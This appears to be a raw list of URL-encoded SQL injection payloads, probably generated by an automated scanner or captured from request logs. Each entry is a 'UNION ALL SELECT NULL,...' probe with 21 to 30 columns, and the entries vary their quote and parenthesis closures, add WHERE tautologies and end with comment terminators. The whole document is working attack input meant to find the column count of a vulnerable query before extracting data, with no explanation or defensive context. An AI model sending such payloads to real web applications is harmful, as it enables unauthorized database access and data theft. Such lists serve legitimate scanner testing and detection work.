1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20WHERE%205975%3D5975%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20WHERE%208554%3D8554%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20WHERE%203586%3D3586%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20WHERE%207116%3D7116%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20WHERE%201209%3D1209%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20WHERE%203116%3D3116%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20WHERE%209451%3D9451%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20WHERE%203990%3D3990%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20WHERE%208543%3D8543%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20WHERE%204152%3D4152%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20WHERE%206994%3D6994%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20WHERE%205875%3D5875%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20WHERE%205230%3D5230%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20WHERE%204782%3D4782%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20WHERE%202070%3D2070%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20WHERE%202908%3D2908%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20WHERE%201300%3D1300%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20WHERE%201683%3D1683%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20WHERE%207097%3D7097%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20WHERE%206750%3D6750%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 